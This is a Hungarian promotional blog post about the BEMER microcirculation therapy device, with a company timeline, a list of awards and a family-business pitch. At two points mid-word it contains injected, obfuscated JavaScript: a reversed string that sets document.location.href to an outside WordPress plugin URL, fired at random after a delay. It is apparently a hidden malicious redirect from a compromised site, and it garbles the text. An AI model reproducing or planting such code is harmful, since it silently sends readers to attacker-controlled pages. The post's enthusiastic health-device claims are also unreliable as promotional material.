Soha nem volt kérdés, hogy valami nagyszerű dolog készül, a BEMER tudományos kutatómunkájában. A BEMER feltalálója egy olyan orvos, aki a fizika tudományát is mélyrehatóan ismeri. Prof Dr. Klopp kutatásai nemcsak egy orvos, hanem egy orvos-fizikus kutatásai is. A betegek gyógyulása érdekében maximális figyelembe veszi, melyek azok a fizikai összefüggések, amelyek segítik a mikrokeringés összefüggéseinek megértését illetve a BEMER impulzusok szempontjából milyen impulzusforma hat leginkább a mikroerekre illetve mikrokeringésre. A korábbi blogokban már összefoglaltam azokat a főbb lépéseket, amelyeket a BEMER szervezete tett a siker érdekében, most azonban egy időrendi sorrendben foglalnám össze:

1998-INNOMED Int. AG alapítása
1999-BEMER jel világszabadalmának elnyerése, a BEMER 3000 bevezetése
2000-saját gyártás kezdete
2003-Nemzetközi terjeszkedés
2006-Együttműködés a Mikrocirkulációs Intézettel
2007-A „BEMER plus” jel kifejlesztése
2009-BEMER kutatás mérföldkő a gyógyászatban, új igények megjelenése
2010-III. generációs jelkonfigurációs terméknemzedék piaci bevezetése
2011-Piaci terjeszkedés, új székház és gyártóhely építése, Red dot design díj elnyerése
2012-Világszerte több mint 1 000 000 felhasználó
2013-A BEMER kutatást ismételten kitüntetik a Science Award tudományos díjjal
(több mint 100 tudományos tanulmány)
2014-A BEMER fizikai érterápiás készülékek újratanúsítása, új klinikai értékelés

A folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos fejlődés egyik fokmérője a különböző tudományos és nem tudományos díjak, mint például:Science Award 2011tudományos díj, Baden-Baden, Werte Award 2011 értékközpontú válalkozói díj, Holzgerlingen, reddot Design Award2011, formatervezési díj, Essen, if communication design Award 2013 kommunikációs design díj, valamint a testlabor.eu terméktesztjén a „ kitűnő” minősítés.

A BEMER családi vállalkozás.

Ezt szó szerint lehet érteni, hiszen vezetőségében túlnyomórészt az alapító családjából áll. Másrészről ezt a kifejezést nem kell szó szerint érteni. Aki ugyanis a BEMER-nél, a BEMER-ért vagy a BEMER-rel dolgozik, hamarosan rájön, hogy itt többről van szó. Az alapító korszak szellemisége a középvállalati méret elérését követően is fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos eleme a világ minden táján működő ország vagy régió képviseletek munkájának. ez pedig ugyanolyan fertőző, mint régebben is volt. Akik BEMER-el foglalkoznak évek óta sokakat magával ragad termékük egyedülállósága és a benne rejlő potenciál. Nem csodagép, de az elmúlt 10 évben számos esetben rácsodálkozom a készülék által elért eredményekre.